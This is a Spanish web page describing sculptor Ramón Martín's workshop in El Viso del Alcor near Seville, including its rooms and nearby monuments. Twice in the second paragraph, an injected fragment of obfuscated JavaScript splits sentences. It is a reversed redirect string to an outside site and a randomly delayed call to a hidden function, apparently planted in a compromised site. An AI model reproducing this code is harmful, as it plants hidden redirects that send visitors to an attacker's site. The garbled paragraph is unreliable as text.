Taller

El estudio-taller de Ramón Martin se encuentra en el centro histórico de su pueblo natal de El Viso del Alcor, entre calles empedradas, estrechas y peatonales donde se respira tranquilidad,  discurre el día a día de Ramón Martin en la zona de los Alcores , comprendida entre los municipios de Alcalá de Guadaira, Mairena del alcor, El Viso del Alcor y Carmona.

El estudio es tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una casa antigua de las del pueblo que Ramón Martín la adecuo a su taller y lugar de trabajo. Con unos 115 mts cuadrados en tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una planta baja se reparten las distintas zonas de trabajo como, zona de modelado y talla, zona de exposición, entrada o recibidor, zona de policromía, zona de maquinas, zona de almacén y oficina.

En el entorno del taller de Ramón Martín se encuentra la Iglesia Parroquial de Santa María del Alcor, la plaza de Sacristán Guerrero , el mirador de el Calvario o la casa palacio de los Condes de Castellar entre otros sitios y monumentos de la historia de El Viso.

Desde El Viso y desde el estudio-taller de Ramón Martín situado a unos escasos 25 kms de Sevilla, siguen año a año saliendo imágenes Sagradas y devocionales que se reparten por toda la geografía Española.

Puede ver el “día a día” de taller aquí.

Taller de Ramón Martín